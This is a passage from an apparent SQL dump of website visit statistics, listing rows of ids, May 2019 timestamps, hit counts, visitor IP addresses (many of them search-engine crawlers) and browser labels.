57800,1,1,0,0,'66.249.64.30','chrome'),(417492,1557057856,1,1,0,0,'141.8.142.38','other'),(417493,1557057903,1,1,0,0,'213.180.203.23','other'),(417494,1557059806,1,1,0,0,'40.77.167.80','other'),(417495,1557060714,1,1,0,0,'178.154.171.30','other'),(417496,1557060718,1,1,0,0,'5.45.207.19','other'),(417497,1557060815,3,3,0,0,'207.46.13.7','other'),(417498,1557061084,1,1,0,0,'178.154.244.49','other'),(417499,1557063413,1,1,0,0,'66.249.64.30','chrome'),(417500,1557063426,1,1,0,0,'157.55.39.233','other'),(417501,1557063783,1,1,0,0,'93.158.166.7','other'),(417502,1557064161,2,2,0,0,'8.29.198.26','other'),(417503,1557065445,2,2,0,0,'40.77.167.154','other'),(417504,1557065628,3,3,0,0,'207.46.13.229','other'),(417505,1557066179,1,1,0,0,'5.255.253.38','other'),(417506,1557066763,1,1,0,0,'46.211.121.202','other'),(417507,1557066863,1,1,0,0,'87.250.224.47','other'),(417508,1557066936,2,2,0,0,'178.154.171.30','other'),(417509,1557066940,1,1,0,0,'141.8.183.11','other'),(417510,1557067056,1,1,0,0,'141.8.142.191','other'),(417511,1557067527,1,1,0,0,'40.77.167.154','other'),(417512,1557068057,1,1,0,0,'66.249.64.31','chrome'),(417513,1557068144,1,1,0,0,'66.249.64.58','chrome'),(417514,1557068204,2,2,0,0,'66.249.64.60','chrome'),(417515,1557068307,1,1,0,0,'66.249.64.62','chrome'),(417516,1557069016,1,1,0,0,'66.249.64.30','chrome'),(417517,1557069067,1,1,0,0,'95.133.57.242','chrome'),(417518,1557069380,1,1,0,0,'158.69.26.144','other'),(417519,1557069412,1,1,0,0,'158.69.26.144','chrome'),(417520,1557071038,1,1,0,0,'66.249.64.30','chrome'),(417521,1557071314,1,1,0,0,'66.249.64.29','chrome'),(417522,1557071593,1,1,0,0,'66.249.64.58','chrome'),(417523,1557071671,1,1,0,0,'95.163.255.157','other'),(417524,1557072368,1,1,0,0,'40.77.167.62','other'),(417525,1557072471,1,1,0,0,'40.77.167.217','other'),(417526,1557072750,1,1,0,0,'207.46.13.180','other'),(417527,1557073221,1,1,0,0,'66.249.64.31','chrome'),(417528,1557074387,1,1,0,0,'66.249.64.29','chrome'),(417529,1557074512,1,1,0,0,'40.77.167.217','other'),(417530,1557074864,1,1,0,0,'95.163.255.167','other'),(417531,1557074992,1,1,0,0,'40.77.167.154','other'),(417532,1557075010,1,1,0,0,'8.29.198.27','other'),(417533,1557075127,1,1,0,0,'8.29.198.25','other'),(417534,1557075527,2,2,0,0,'66.249.64.31','chrome'),(417535,1557075631,1,1,0,0,'66.249.64.30','chrome'),(417536,1557076305,1,1,0,0,'95.108.213.4','other'),(417537,1557076434,1,1,0,0,'178.154.171.27','other'),(417538,1557076676,1,1,0,0,'66.249.64.31','chrome'),(417539,1557077092,1,1,0,0,'157.55.39.122','other'),(417540,1557077261,1,1,0,0,'93.158.166.7','other'),(417541,1557077297,1,1,0,0,'66.249.64.30','chrome'),(417542,1557077988,2,2,0,0,'157.55.39.89','other'),(417543,1557078197,1,1,0,0,'166.78.151.162','chrome'),(417544,1557078287,2,2,0,0,'66.249.64.29','chrome'),(417545,1557078668,1,1,0,0,'178.92.73.128','chrome'),(417546,1557078898,1,1,0,0,'66.249.64.62','chrome'),(417547,1557078969,1,1,0,0,'157.55.39.150','other'),(417548,1557079770,1,1,0,0,'141.8.142.144','other'),(417549,1557079781,1,1,0,0,'95.108.181.94','other'),(417550,1557080087,2,2,0,0,'157.55.39.122','other'),(417551,1557080155,1,1,0,0,'95.108.213.4','other'),(417552,1557080173,1,1,0,0,'141.8.142.191','other'),(417553,1557080186,1,1,0,0,'178.154.171.30','other'),(417554,1557080626,1,1,0,0,'66.249.64.29','chrome'),(417555,1557081563,1,1,0,0,'66.249.64.31','chrome'),(417556,1557081993,1,1,0,0,'157.55.39.232','other'),(417557,1557082189,1,1,0,0,'157.55.39.122','other'),(417558,1557082648,1,1,0,0,'176.126.162.121','chrome'),(417559,1557083127,1,1,0,0,'157.55.39.232','other'),(417560,1557083403,1,1,0,0,'66.249.64.60','chrome'),(417561,1557083477,1,1,0,0,'157.55.39.122','other'),(417562,1557083591,1,1,0,0,'66.249.64.31','chrome'),(417563,1557083654,1,1,0,0,'66.249.64.30','chrome'),(417564,1557083655,1,1,0,0,'141.8.142.81','other'),(417565,1557083704,1,1,0,0,'178.154.200.8','other'),(417566,1557084063,1,1,0,0,'93.158.166.7','other'),(417567,1557084223,1,1,0,0,'5.255.253.38','other'),(417568,1557084391,1,1,0,0,'178.154.171.17','other'),(417569,1557084549,1,1,0,0,'141.8.142.144','other'),(417570,1557085188,1,1,0,0,'178.154.244.11','other'),(417571,1557085294,1,1,0,0,'87.250.224.118','other'),(417572,1557085441,1,1,0,0,'95.163.255.98','other'),(417573,1557085612,1,1,0,0,'66.249.64.62','chrome'),(417574,1557085850,1,1,0,0,'8.29.198.27','other'),(417575,1557085953,1,1,0,0,'87.250.224.107','other'),(417576,1557085955,1,1,0,0,'87.250.224.81','other'),(417577,1557085975,1,1,0,0,'8.29.198.26','other'),(417578,1557086450,1,1,0,0,'178.154.171.30','other'),(417579,1557086668,1,1,0,0,'207.46.13.180','other'),(417580,1557086773,3,3,0,0,'178.154.171.17','other'),(417581,1557087236,1,1,0,0,'178.154.171.69','other'),(417582,1557087245,1,1,0,0,'195.69.249.67','chrome'),(417583,1557087439,1,1,0,0,'66.249.64.60','chrome'),(417584,1557087953,1,1,0,0,'157.55.39.232','other'),(417585,1557088423,1,1,0,0,'66.249.64.30','chrome'),(417586,1557088983,1,1,0,0,'178.154.244.49','other'),(417587,1557088998,1,1,0,0,'66.249.64.60','chrome'),(417588,1557089031,2,2,0,0,'178.154.171.30','other'),(417589,1557089057,1,1,0,0,'95.163.255.176','other'),(417590,1557089092,1,1,0,0,'66.249.64.58','chrome'),(417591,1557089302,1,1,0,0,'5.255.253.38','other'),(417592,1557089329,1,1,0,0,'66.249.64.29','chrome'),(417593,1557089476,1,1,0,0,'37.9.113.103','other'),(417594,1557089566,1,1,0,0,'95.163.255.190','other'),(417595,1557089641,2,2,0,0,'66.249.64.30','chrome'),(417596,1557089781,1,1,0,0,'207.46.13.180','other'),(417597,1557090504,2,2,0,0,'66.249.64.31','chrome'),(417598,1557091007,1,1,0,0,'66.249.64.58','chrome'),(417599,1557091013,1,1,0,0,'66.249.64.30','chrome'),(417600,1557091056,1,1,0,0,'66.249.64.29','chrome'),(417601,1557091108,1,1,0,0,'207.46.13.65','other'),(417602,1557091289,1,1,0,0,'157.55.39.232','other'),(417603,1557092310,2,2,0,0,'66.249.64.60','chrome'),(417604,1557092418,2,2,0,0,'66.249.64.29','chrome'),(417605,1557092731,1,1,0,0,'178.154.244.11','other'),(417606,1557092983,1,1,0,0,'213.180.203.53','other'),(417607,1557093753,1,1,0,0,'207.46.13.65','other'),(417608,1557093778,1,1,0,0,'188.32.229.11','msie'),(417609,1557094348,1,1,0,0,'37.9.113.38','other'),(417610,1557094805,1,1,0,0,'95.163.255.194','other'),(417611,1557094884,1,1,0,0,'66.249.64.30','chrome'),(417612,1557095507,1,1,0,0,'66.249.64.29','chrome'),(417613,1557095530,1,1,0,0,'66.249.64.28','chrome'),(417614,1557095723,1,1,0,0,'95.163.255.168','other'),(417615,1557096191,2,2,0,0,'157.55.39.122','other'),(417616,1557096687,2,2,0,0,'8.29.198.25','other'),(417617,1557096841,1,1,0,0,'178.154.200.8','other'),(417618,1557096990,1,1,0,0,'178.154.244.49','other'),(417619,1557097042,1,1,0,0,'66.249.64.29','chrome'),(417620,1557097676,2,2,0,0,'207.46.13.167','other'),(417621,1557098177,2,2,0,0,'66.249.64.60','chrome'),(417622,1557099047,1,1,0,0,'66.249.64.30','chrome'),(417623,1557100034,2,2,0,0,'178.154.200.8','other'),(417624,1557100227,1,1,0,0,'178.154.244.21','other'),(417625,1557100331,1,1,0,0,'87.250.224.65','other'),(417626,1557100336,1,1,0,0,'5.255.253.25','other'),(417627,1557100887,1,1,0,0,'157.55.39.122','other'),(417628,1557101273,1,1,0,0,'95.163.255.194','other'),(417629,1557101384,1,1,0,0,'207.46.13.167','other'),(417630,1557101452,1,1,0,0,'66.249.64.30','chrome'),(417631,1557101809,2,2,0,0,'66.249.64.29','chrome'),(417632,1557102386,1,1,0,0,'66.249.64.30','chrome'),(417633,1557102582,2,2,0,0,'157.55.39.122','other'),(417634,1557103085,1,1,0,0,'40.77.167.42','other'),(417635,1557103859,1,1,0,0,'141.8.142.191','other'),(417636,1557104267,1,1,0,0,'66.249.64.60','chrome'),(417637,1557106188,2,2,0,0,'66.249.64.29','chrome'),(417638,1557106562,1,1,0,0,'93.158.166.7','other'),(417639,1557107376,1,1,0,0,'87.250.224.47','other'),(417640,1557107381,1,1,0,0,'5.255.253.38','other'),(417641,1557107484,1,1,0,0,'40.77.167.17','other'),(417642,1557107522,1,1,0,0,'8.29.198.25','other'),(417643,1557107658,1,1,0,0,'8.29.198.27','other'),(417644,1557107795,1,1,0,0,'180.76.15.30','other'),(417645,1557108392,1,1,0,0,'66.249.64.31','chrome'),(417646,1557108949,1,1,0,0,'66.249.64.29','chrome'),(417647,1557109265,1,1,0,0,'178.154.244.11','other'),(417648,1557109877,1,1,0,0,'207.46.13.167','other'),(417649,1557110407,1,1,0,0,'66.249.64.31','chrome'),(417650,1557110766,1,1,0,0,'39.100.40.131','other'),(417651,1557110990,1,1,0,0,'213.180.203.61','other'),(417652,1557111038,1,1,0,0,'141.8.142.191','other'),(417653,1557111282,1,1,0,0,'66.249.64.62','chrome'),(417654,1557111504,1,1,0,0,'66.249.64.31','chrome'),(417655,1557111616,1,1,0,0,'66.249.64.29','chrome'),(417656,1557111714,2,2,0,0,'34.220.17.118','chrome'),(417657,1557111794,1,1,0,0,'180.76.15.32','other'),(417658,1557112032,1,1,0,0,'207.46.13.167','other'),(417659,1557112698,1,1,0,0,'66.249.64.30','chrome'),(417660,1557113465,1,1,0,0,'207.46.13.167','other'),(417661,1557114433,1,1,0,0,'66.249.64.31','chrome'),(417662,1557114474,2,2,0,0,'207.46.13.50','other'),(417663,1557115564,1,1,0,0,'66.249.64.62','chrome'),(417664,1557115621,1,1,0,0,'87.250.224.107','other'),(417665,1557115730,1,1,0,0,'66.249.64.31','chrome'),(417666,1557115737,1,1,0,0,'66.249.64.29','chrome'),(417667,1557115831,1,1,0,0,'141.8.142.38','other'),(417668,1557115855,1,1,0,0,'213.180.203.23','other'),(417669,1557115869,1,1,0,0,'40.77.167.17','other'),(417670,1557116974,1,1,0,0,'66.249.64.58','chrome'),(417671,1557117261,3,3,0,0,'207.46.13.34','other'),(417672,1557117265,7,7,0,0,'207.46.13.5','other'),(417673,1557117271,5,5,0,0,'40.77.167.17','other'),(417674,1557117276,2,2,0,0,'157.55.39.8','other'),(417675,1557117760,1,1,0,0,'95.163.255.156','other'),(417676,1557117771,1,1,0,0,'66.249.64.30','chrome'),(417677,1557118207,1,1,0,0,'66.249.64.62','chrome'),(417678,1557118357,1,1,0,0,'8.29.198.27','other'),(417679,1557118494,1,1,0,0,'8.29.198.26','other'),(417680,1557118751,1,1,0,0,'91.209.11.236','other'),(417681,1557119051,1,1,0,0,'66.249.64.30','chrome'),(417682,1557119070,2,2,0,0,'66.249.64.29','chrome'),(417683,1557120083,1,1,0,0,'193.201.225.45','other'),(417684,1557120115,1,1,0,0,'213.180.203.53','other'),(417685,1557120128,1,1,0,0,'178.154.244.21','other'),(417686,1557120132,1,1,0,0,'91.196.179.134','chrome'),(417687,1557120139,2,2,0,0,'95.108.181.75','other'),(417688,1557120164,1,1,0,0,'178.154.171.69','other'),(417689,1557120281,1,1,0,0,'37.9.113.38','other'),(417690,1557120295,2,2,0,0,'87.250.224.107','other'),(417691,1557120383,1,1,0,0,'178.154.244.49','other'),(417692,1557120386,1,1,0,0,'178.154.200.48','other'),(417693,1557120464,1,1,0,0,'157.55.39.8','other'),(417694,1557120822,1,1,0,0,'141.8.142.191','other'),(417695,1557120963,1,1,0,0,'91.196.178.65','chrome'),(417696,1557120975,2,2,0,0,'66.249.64.30','chrome'),(417697,1557121752,1,1,0,0,'46.200.250.89','chrome'),(417698,1557122075,1,1,0,0,'66.249.64.30','chrome'),(417699,1557122342,1,1,0,0,'178.154.171.30','other'),(417700,1557122430,1,1,0,0,'40.77.167.17','other'),(417701,1557122713,1,1,0,0,'66.249.64.58','chrome'),(417702,1557123311,1,1,0,0,'207.46.13.14','other'),(417703,1557124044,1,1,0,0,'66.249.64.30','chrome'),(417704,1557124197,2,2,0,0,'66.249.64.29','chrome'),(417705,1557125157,1,1,0,0,'66.249.64.30','chrome'),(417706,1557125382,1,1,0,0,'95.108.181.83','other'),(417707,1557125503,1,1,0,0,'5.45.207.76','other'),(417708,1557125590,1,1,0,0,'213.180.203.23','other'),(417709,1557125601,1,1,0,0,'66.249.64.62','chrome'),(417710,1557125623,1,1,0,0,'95.108.213.50','other'),(417711,1557125813,2,2,0,0,'66.249.64.29','chrome'),(417712,1557126150,1,1,0,0,'66.249.64.30','chrome'),(417713,1557126152,2,2,0,0,'157.55.39.230','other'),(417714,1557126505,1,1,0,0,'157.55.39.8','other'),(417715,1557126892,1,1,0,0,'178.93.148.23','chrome'),(417716,1557126943,1,1,0,0,'91.196.178.68','chrome'),(417717,1557127030,1,1,0,0,'95.163.255.97','other'),(417718,1557127484,2,2,0,0,'91.196.178.82','chrome'),(417719,1557127793,2,2,0,0,'66.249.64.30','chrome'),(417720,1557127836,1,1,0,0,'91.196.178.174','chrome'),(417721,1557127907,1,1,0,0,'66.249.64.58','chrome'),(417722,1557127917,1,1,0,0,'66.249.64.60','chrome'),(417723,1557128183,1,1,0,0,'207.46.13.14','other'),(417724,1557128259,1,1,0,0,'66.249.64.31','chrome'),(417725,1557128607,1,1,0,0,'37.53.90.175','chrome'),(417726,1557128841,1,1,0,0,'91.196.177.46','firefox'),(417727,1557129191,1,1,0,0,'8.29.198.26','other'),(417728,1557129337,1,1,0,0,'8.29.198.27','other'),(417729,1557130206,1,1,0,0,'141.8.142.38','other'),(417730,1557130265,1,1,0,0,'87.250.224.65','other'),(417731,1557130280,1,1,0,0,'5.255.253.25','other'),(417732,1557130456,1,1,0,0,'66.249.64.30','chrome'),(417733,1557130542,1,1,0,0,'141.8.142.81','other'),(417734,1557130557,2,2,0,0,'66.249.64.60','chrome'),(417735,1557130609,1,1,0,0,'87.250.224.107','other'),(417736,1557130776,1,1,0,0,'66.249.64.29','chrome'),(417737,1557131120,1,1,0,0,'207.46.13.5','other'),(417738,1557131137,1,1,0,0,'37.54.41.142','opera'),(417739,1557131395,1,1,0,0,'66.249.64.62','chrome'),(417740,1557131853,2,2,0,0,'157.55.39.230','other'),(417741,1557132032,1,1,0,0,'213.180.203.61','other'),(417742,1557132583,1,1,0,0,'66.249.64.30','chrome'),(417743,1557132792,1,1,0,0,'157.55.39.230','other'),(417744,1557132819,1,1,0,0,'66.249.64.31','chrome'),(417745,1557133396,1,1,0,0,'66.249.64.29','chrome'),(417746,1557133408,1,1,0,0,'157.55.39.8','other'),(417747,1557133707,1,1,0,0,'46.211.67.235','chrome'),(417748,1557134166,1,1,0,0,'66.249.64.31','chrome'),(417749,1557134697,2,2,0,0,'66.249.64.30','chrome'),(417750,1557134725,1,1,0,0,'95.163.255.166','other'),(417751,1557134936,1,1,0,0,'46.119.123.213','chrome'),(417752,1557134942,1,1,0,0,'141.8.183.11','other'),(417753,1557135125,1,1,0,0,'178.154.244.11','other'),(417754,1557135543,1,1,0,0,'95.163.255.178','other'),(417755,1557135546,1,1,0,0,'95.163.255.172','other'),(417756,1557135569,1,1,0,0,'95.163.255.164','other'),(417757,1557135655,2,2,0,0,'66.249.64.30','chrome'),(417758,1557137079,1,1,0,0,'207.46.13.14','other'),(417759,1557137146,1,1,0,0,'157.55.39.230','other'),(417760,1557137153,1,1,0,0,'66.249.64.31','chrome'),(417761,1557137639,1,1,0,0,'109.74.154.72','chrome'),(417762,1557138118,1,1,0,0,'66.249.64.58','chrome'),(417763,1557138139,1,1,0,0,'66.249.64.29','chrome'),(417764,1557138287,1,1,0,0,'66.249.64.31','chrome'),(417765,1557138433,1,1,0,0,'95.163.255.187','other'),(417766,1557138496,1,1,0,0,'66.249.64.62','chrome'),(417767,1557138695,1,1,0,0,'193.194.124.186','chrome'),(417768,1557138794,1,1,0,0,'207.46.13.14','other'),(417769,1557139129,1,1,0,0,'66.249.64.60','chrome'),(417770,1557139610,1,1,0,0,'141.8.183.11','other'),(417771,1557139662,1,1,0,0,'178.154.200.8','other'),(417772,1557139669,1,1,0,0,'141.8.142.162','other'),(417773,1557139830,1,1,0,0,'157.55.39.230','other'),(417774,1557139902,1,1,0,0,'198.100.145.189','firefox'),(417775,1557139928,2,2,0,0,'66.249.64.62','chrome'),(417776,1557139945,1,1,0,0,'95.108.181.75','other'),(417777,1557140024,1,1,0,0,'8.29.198.26','other'),(417778,1557140047,1,1,0,0,'5.255.253.25','other'),(417779,1557140060,1,1,0,0,'178.154.171.17','other'),(417780,1557140174,1,1,0,0,'8.29.198.25','other'),(417781,1557140176,1,1,0,0,'87.250.224.65','other'),(417782,1557140273,1,1,0,0,'213.180.203.53','other'),(417783,1557140276,1,1,0,0,'37.9.113.103','other'),(417784,1557140390,1,1,0,0,'66.249.64.30','chrome'),(417785,1557140434,1,1,0,0,'213.180.203.23','other'),(417786,1557140816,1,1,0,0,'91.196.178.178','chrome'),(417787,1557140929,2,2,0,0,'40.77.167.142','other'),(417788,1557141257,1,1,0,0,'95.163.255.173','other'),(417789,1557141261,1,1,0,0,'95.163.255.183','other'),(417790,1557141282,1,1,0,0,'95.163.255.159','other'),(417791,1557141457,2,2,0,0,'66.249.64.31','chrome'),(417792,1557141825,1,1,0,0,'91.196.178.82','chrome'),(417793,1557142285,1,1,0,0,'66.249.64.29','chrome'),(417794,1557142948,1,1,0,0,'95.163.255.98','other'),(417795,1557143702,2,2,0,0,'66.249.64.29','chrome'),(417796,1557144191,1,1,0,0,'207.46.13.176','other'),(417797,1557144344,2,2,0,0,'207.46.13.183','other'),(417798,1557144549,2,2,0,0,'157.55.39.176','other'),(417799,1557145326,2,2,0,0,'141.8.142.81','other'),(417800,1557145441,1,1,0,0,'37.9.113.38','other'),(417801,1557145473,1,1,0,0,'46.211.27.152','chrome'),(417802,1557145720,1,1,0,0,'87.250.224.118','other'),(417803,1557145951,1,1,0,0,'141.8.142.191','other'),(417804,1557146170,1,1,0,0,'217.25.198.229','firefox'),(417805,1557146198,1,1,0,0,'157.55.39.181','other'),(417806,1557146280,1,1,0,0,'195.10.210.70','chrome'),(417807,1557146463,3,3,0,0,'66.249.64.31','chrome'),(417808,1557147469,1,1,0,0,'91.196.178.67','firefox'),(417809,1557147766,1,1,0,0,'157.55.39.176','other'),(417810,1557148536,1,1,0,0,'66.249.64.30','chrome'),(417811,1557148537,1,1,0,0,'77.222.96.191','firefox'),(417812,1557148872,1,1,0,0,'66.249.64.29','chrome'),(417813,1557148994,1,1,0,0,'66.249.64.58','chrome'),(417814,1557149186,2,2,0,0,'66.249.64.31','chrome'),(417815,1557149246,1,1,0,0,'37.73.212.113','chrome'),(417816,1557149751,2,2,0,0,'207.46.13.174','other'),(417817,1557149852,1,1,0,0,'66.249.64.30','chrome'),(417818,1557151016,1,1,0,0,'5.255.253.38','other'),(417819,1557151142,2,2,0,0,'37.9.113.20','other'),(417820,1557151191,1,1,0,0,'5.45.207.79','other'),(417821,1557151306,1,1,0,0,'213.180.203.40','other'),(417822,1557151323,1,1,0,0,'91.124.182.170','firefox'),(417823,1557151328,1,1,0,0,'5.45.207.8','other'),(417824,1557151360,1,1,0,0,'8.29.198.27','other'),(417825,1557151488,1,1,0,0,'8.29.198.25','other'),(417826,1557151616,1,1,0,0,'46.200.250.89','chrome'),(417827,1557151687,1,1,0,0,'157.55.39.143','other'),(417828,1557151991,2,2,0,0,'66.249.64.30','chrome'),(417829,1557152331,1,1,0,0,'157.55.39.131','other'),(417830,1557152751,1,1,0,0,'66.249.64.60','chrome'),(417831,1557152918,1,1,0,0,'66.249.64.62','chrome'),(417832,1557152951,1,1,0,0,'157.55.39.141','other'),(417833,1557154467,1,1,0,0,'157.55.39.184','other'),(417834,1557154499,1,1,0,0,'157.55.39.181','other'),(417835,1557154518,1,1,0,0,'213.180.203.48','other'),(417836,1557154759,1,1,0,0,'66.249.64.29','chrome'),(417837,1557154786,1,1,0,0,'95.108.181.96','other'),(417838,1557155021,1,1,0,0,'66.249.64.31','chrome'),(417839,1557155780,1,1,0,0,'157.55.39.143','other'),(417840,1557155989,1,1,0,0,'66.249.64.30','chrome'),(417841,1557156208,1,1,0,0,'109.87.205.112','chrome'),(417842,1557156578,1,1,0,0,'66.249.64.58','chrome'),(417843,1557156710,1,1,0,0,'40.77.167.207','other'),(417844,1557157021,1,1,0,0,'157.55.39.134','other'),(417845,1557157417,1,1,0,0,'66.249.64.60','chrome'),(417846,1557157475,2,2,0,0,'40.77.167.59','other'),(417847,1557157520,1,1,0,0,'66.249.64.30','chrome'),(417848,1557158005,1,1,0,0,'157.55.39.221','other'),(417849,1557158204,1,1,0,0,'95.163.255.151','other'),(417850,1557158210,2,2,0,0,'66.249.64.31','chrome'),(417851,1557159017,1,1,0,0,'66.249.64.29','chrome'),(417852,1557159097,1,1,0,0,'95.163.255.154','other'),(417853,1557159216,1,1,0,0,'46.211.110.184','chrome'),(417854,1557159305,1,1,0,0,'178.154.244.49','other'),(417855,1557159306,1,1,0,0,'87.250.224.64','other'),(417856,1557159945,1,1,0,0,'40.77.167.81','other'),(417857,1557160774,1,1,0,0,'40.77.167.118','other'),(417858,1557161579,1,1,0,0,'178.154.171.30','other'),(417859,1557161616,1,1,0,0,'66.249.64.29','chrome'),(417860,1557161624,1,1,0,0,'141.8.142.81','other'),(417861,1557162219,1,1,0,0,'8.29.198.25','other'),(417862,1557162318,1,1,0,0,'8.29.198.27','other'),(417863,1557162813,1,1,0,0,'104.148.64.26','chrome'),(417864,1557163217,1,1,0,0,'207.46.13.7','other'),(417865,1557163224,2,2,0,0,'40.77.167.145','other'),(417866,1557163615,1,1,0,0,'91.196.178.166','chrome'),(417867,1557164101,2,2,0,0,'66.249.64.30','chrome'),(417868,1557164188,1,1,0,0,'40.77.167.157','other'),(417869,1557164938,1,1,0,0,'93.126.75.8','chrome'),(417870,1557165208,1,1,0,0,'87.250.224.65','other'),(417871,1557165308,1,1,0,0,'66.249.64.30','chrome'),(417872,1557165312,1,1,0,0,'66.249.64.29','chrome'),(417873,1557166422,1,1,0,0,'66.249.64.30','chrome'),(417874,1557166801,1,1,0,0,'91.196.178.68','firefox'),(417875,1557166962,1,1,0,0,'40.77.167.99','other'),(417876,1557167261,1,1,0,0,'66.249.64.31','chrome'),(417877,1557167492,2,2,0,0,'66.249.64.30','chrome'),(417878,1557167715,1,1,0,0,'40.77.167.74','other'),(417879,1557167745,1,1,0,0,'66.249.64.29','chrome'),(417880,1557168469,3,3,0,0,'40.77.167.208','other'),(417881,1557168478,4,4,0,0,'40.77.167.99','other'),(417882,1557168483,2,2,0,0,'207.46.13.83','other'),(417883,1557168561,1,1,0,0,'95.108.181.96','other'),(417884,1557168726,1,1,0,0,'141.8.183.11','other'),(417885,1557168789,1,1,0,0,'95.108.213.4','other'),(417886,1557169217,2,2,0,0,'66.249.64.31','chrome'),(417887,1557169270,1,1,0,0,'66.249.64.60','chrome'),(417888,1557169351,1,1,0,0,'66.249.64.29','chrome'),(417889,1557169461,1,1,0,0,'157.55.39.180','other'),(417890,1557169894,1,1,0,0,'95.163.255.191','other'),(417891,1557169913,1,1,0,0,'95.163.255.197','other'),(417892,1557169916,1,1,0,0,'95.163.255.190','other'),(417893,1557170452,2,2,0,0,'40.77.167.82','other'),(417894,1557171152,1,1,0,0,'66.249.64.31','chrome'),(417895,1557171358,2,2,0,0,'95.213.141.126','opera'),(417896,1557171880,1,1,0,0,'83.242.105.114','chrome'),(417897,1557172293,1,1,0,0,'207.46.13.68','other'),(417898,1557172338,1,1,0,0,'95.108.181.57','other'),(417899,1557172645,1,1,0,0,'5.255.253.38','other'),(417900,1557172647,1,1,0,0,'66.249.64.29','chrome'),(417901,1557172687,1,1,0,0,'178.154.244.49','other'),(417902,1557172832,1,1,0,0,'66.249.64.62','chrome'),(417903,1557172852,1,1,0,0,'66.249.64.31','chrome'),(417904,1557173072,2,2,0,0,'8.29.198.25','other'),(417905,1557173332,1,1,0,0,'178.154.200.8','other'),(417906,1557173390,1,1,0,0,'178.154.171.69','other'),(417907,1557173427,1,1,0,0,'141.8.142.108','other'),(417908,1557173486,1,1,0,0,'207.46.13.167','other'),(417909,1557173649,1,1,0,0,'87.250.224.107','other'),(417910,1557173698,1,1,0,0,'178.154.244.11','other'),(417911,1557173701,1,1,0,0,'87.250.224.47','other'),(417912,1557173703,1,1,0,0,'87.250.224.65','other'),(417913,1557173706,1,1,0,0,'37.9.113.148','other'),(417914,1557173979,1,1,0,0,'5.255.253.22','other'),(417915,1557174059,1,1,0,0,'66.249.64.29','chrome'),(417916,1557174220,1,1,0,0,'209.17.96.234','other'),(417917,1557174325,1,1,0,0,'95.163.255.169','other'),(417918,1557175140,1,1,0,0,'207.46.13.167','other'),(417919,1557175178,2,2,0,0,'66.249.64.30','chrome'),(417920,1557175720,1,1,0,0,'95.163.255.153','other'),(417921,1557175897,1,1,0,0,'5.255.253.38','other'),(417922,1557175925,1,1,0,0,'178.154.244.11','other'),(417923,1557175944,1,1,0,0,'178.154.171.69','other'),(417924,1557175989,1,1,0,0,'142.93.69.220','other'),(417925,1557176106,1,1,0,0,'87.250.224.99','other'),(417926,1557176108,1,1,0,0,'95.163.255.178','other'),(417927,1557176118,1,1,0,0,'5.45.207.80','other'),(417928,1557176395,1,1,0,0,'138.197.0.92','other'),(417929,1557178289,1,1,0,0,'66.249.64.60','chrome'),(417930,1557178814,1,1,0,0,'66.249.64.31','chrome'),(417931,1557179339,3,3,0,0,'35.226.134.76','chrome'),(417932,1557179382,3,3,0,0,'35.239.177.240','chrome'),(417933,1557179407,3,3,0,0,'104.155.142.11','chrome'),(417934,1557179420,3,3,0,0,'104.154.255.84','chrome'),(417935,1557179433,3,3,0,0,'34.66.127.78','chrome'),(417936,1557179446,3,3,0,0,'34.66.104.25','chrome'),(417937,1557179755,1,1,0,0,'157.55.39.120','other'),(417938,1557179842,1,1,0,0,'66.249.64.29','chrome'),(417939,1557180848,1,1,0,0,'213.180.203.23','other'),(417940,1557181044,1,1,0,0,'157.55.39.120','other'),(417941,1557181129,1,1,0,0,'95.163.255.191','other'),(417942,1557182085,1,1,0,0,'87.250.224.107','other'),(417943,1557182388,1,1,0,0,'213.180.203.40','other'),(417944,1557182555,1,1,0,0,'5.255.253.22','other'),(417945,1557182801,1,1,0,0,'178.154.171.17','other'),(417946,1557183205,1,1,0,0,'141.8.142.162','other'),(417947,1557183938,1,1,0,0,'8.29.198.25','other'),(417948,1557184023,1,1,0,0,'8.29.198.26','other'),(417949,1557184236,1,1,0,0,'141.8.142.38','other'),(417950,1557184845,1,1,0,0,'66.249.64.29','chrome'),(417951,1557185670,1,1,0,0,'66.249.64.30','chrome'),(417952,1557185688,1,1,0,0,'178.154.171.27','other'),(417953,1557185781,1,1,0,0,'141.8.183.11','other'),(417954,1557185787,1,1,0,0,'178.154.200.8','other'),(417955,1557185875,1,1,0,0,'66.249.64.29','chrome'),(417956,1557185937,1,1,0,0,'66.249.64.60','chrome'),(417957,1557185953,1,1,0,0,'66.249.64.31','chrome'),(417958,1557186189,1,1,0,0,'141.8.142.38','other'),(417959,1557186526,1,1,0,0,'40.77.167.44','other'),(417960,1557187623,1,1,0,0,'66.249.64.31','chrome'),(417961,1557187681,1,1,0,0,'178.154.244.11','other'),(417962,1557187828,1,1,0,0,'40.77.167.49','other'),(417963,1557188118,1,1,0,0,'72.13.36.80','other'),(417964,1557189050,1,1,0,0,'213.180.203.53','other'),(417965,1557189259,1,1,0,0,'5.255.253.16','other'),(417966,1557189433,1,1,0,0,'40.77.167.4','other'),(417967,1557189937,1,1,0,0,'95.163.255.177','other'),(417968,1557190035,3,3,0,0,'66.249.64.31','chrome'),(417969,1557191870,1,1,0,0,'40.77.167.4','other'),(417970,1557192778,2,2,0,0,'40.77.167.4','other'),(417971,1557192955,1,1,0,0,'66.249.64.29','chrome'),(417972,1557192982,1,1,0,0,'180.76.15.16','other'),(417973,1557193089,1,1,0,0,'213.180.203.53','other'),(417974,1557193155,1,1,0,0,'141.8.142.108','other'),(417975,1557193205,1,1,0,0,'178.154.171.30','other'),(417976,1557193338,1,1,0,0,'95.163.255.188','other'),(417977,1557193687,1,1,0,0,'40.77.167.49','other'),(417978,1557193871,1,1,0,0,'207.46.13.189','other'),(417979,1557193979,1,1,0,0,'66.249.64.29','chrome'),(417980,1557194055,1,1,0,0,'51.15.124.33','firefox'),(417981,1557194219,1,1,0,0,'178.154.244.21','other'),(417982,1557194722,1,1,0,0,'66.249.64.31','chrome'),(417983,1557194787,1,1,0,0,'8.29.198.26','other'),(417984,1557194859,1,1,0,0,'8.29.198.25','other'),(417985,1557194981,1,1,0,0,'180.76.15.158','other'),(417986,1557195030,2,2,0,0,'40.77.167.49','other'),(417987,1557196660,2,2,0,0,'178.154.171.69','other'),(417988,1557196684,1,1,0,0,'95.108.181.94','other'),(417989,1557196698,1,1,0,0,'178.154.171.27','other'),(417990,1557196783,1,1,0,0,'5.45.207.76','other'),(417991,1557196886,1,1,0,0,'178.154.171.17','other'),(417992,1557196895,1,1,0,0,'213.180.203.61','other'),(417993,1557196994,1,1,0,0,'95.163.255.93','other'),(417994,1557197349,1,1,0,0,'93.158.166.7','other'),(417995,1557197352,